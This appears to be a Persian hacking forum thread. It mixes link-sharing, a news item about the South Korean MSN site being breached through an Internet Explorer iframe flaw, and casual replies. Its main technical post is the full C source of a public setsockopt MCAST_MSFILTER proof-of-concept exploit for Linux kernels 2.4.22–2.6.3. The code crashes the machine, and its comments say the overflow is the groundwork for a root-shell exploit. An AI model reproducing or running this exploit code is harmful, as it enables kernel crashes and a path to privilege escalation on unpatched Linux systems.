محافظت از سرور لینوکس . LOOOOOL
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
کتاب Security plus :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
حتما دانلود کنید .![]()
اینم که خیلی ضایع معلومه چیه
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
:lol: :lol:
اقا تازه من شروع كردم به خوندن اين تاپيك اما خيلي باحال هست ادامه بدين![]()
سایت MSN کره جنوبی هک شد
نويسنده : فرهاد جعفري تاريخ انتشار : 15/03/1384
روز پنجشنبه گذشته بعد از اینکه هکرها به سایت MSN کره جنوبی نفوذ کردند سرور این سایت به مدت 10 ساعت خاموش شد
هکرهایی که به سایت MSN کره جنوبی نفوذ کرده بودند سعی در سرقت نام های کاربری و اسم های رمز را داشته اند که شرکت مایکروسافت از نفوذ این هکرها با خبر می شود و سرور هاستینگ سایت MSN کره جنوبی را خاموش می کند. مایکروسافت می گوید: سرویس دهنده را خاموش کردیم تا از پاک بودن سیستم عامل از کدهای مخرب آسوده خاطر شویم.
سخنگوی شرکت مایکروسافت در مورد هک شدن سایت MSN کره جنوبی می گوید که این سایت به سبب استفاده از آسیب پذیری Iframe مرورگر Internet Explorer هک شده است، در صورتی که اصلاحیه این آسیب پذیری در ماه دسامبر سال پیش منتشر شده است.
سایت MSN کره جنوبی یکی از پرطرفدار ترین سایت های کشور کره می باشد که صفحه اول آن کاملا شبیه سایت رسمی MSN می باشد ولی این سایت مستقیما بدست شرکت مایکروسافت اداره نمی شود و از زیر مجموعه های این شرکت می باشد.
زمان دقیق هک شدن این سایت روز سه شنبه می باشد که بعد از گذشت دو روز متخصصین امنیت از وجود کدهای مخرب روی سرویس دهنده آگاه شدند و سرور را خاموش کردند.
مایکروسافت می گوید که ما با هکرهای این سایت بطور قانونی برخورد خواهیم کرد.
wow
مرسي ان بي اس فاكر.
بازم تركونديا.
منم با اجازه شما يه چيزي ميذارم.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
for mamad_TNT
Vulnerable SystemsVulnerable Systems:
* Linux kernel versions 2.4.22 up to 2.4.25, 2.6.1 up to 2.6.3
Immune Systems:
* Linux kernel versions 2.4.26, 2.6.4
Exploit:
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
vulnerability found (as always by Paul Starzetz
This is only a lame POC which will crash the machine, no root shell here.
Maybe later, when everybody will have an updated box.
It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.
Greets to Christophe Devine, too bad you wasn't with me for this one.
*/
#include <errno.h>
void perror (const char *s);
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>
#define SOL_IP 0
#define MCAST_MSFILTER 48
/* mynumsrc and alloc_room control the overflow
* what we write can be controlled too (not needed
* here but needed for rootshell exploit
*/
#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1 /* let it alocate only one u32 */
struct mygroup_filter
{
__u32 gf_interface; /* interface index */
struct sockaddr_storage gf_group; /* multicast address */
__u32 gf_fmode; /* filter mode */
__u32 gf_numsrc; /* number of sources */
struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */
};
void
main (void)
{
int mysocket;
int sockprot;
struct mygroup_filter mygroup;
int optlen;
int i;
struct sockaddr_in *psin;
mygroup.gf_interface = 0;
mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;
mygroup.gf_group.ss_family = AF_INET;
for (i = 0; i < mynumsrc; i++)
{
psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
psin->sin_family = AF_INET;
}
mysocket = socket (PF_INET, SOCK_STREAM, 0);
if (mysocket == -1)
{
perror ("Socket creation error: ");
exit (1);
}
optlen = sizeof (struct mygroup_filter);
printf ("Calling setsockopt(), this should crash the box...\n");
sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);
if (sockprot == -1)
{
perror ("Invalid setsockopt: ");
exit (1);
}
}
is This a Dream ??????
سلام.
من كه چيز زيادي از اينا نميفهمم.؟؟؟؟؟؟؟؟
لطفا يكم بيشتر توضيح بديد.
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)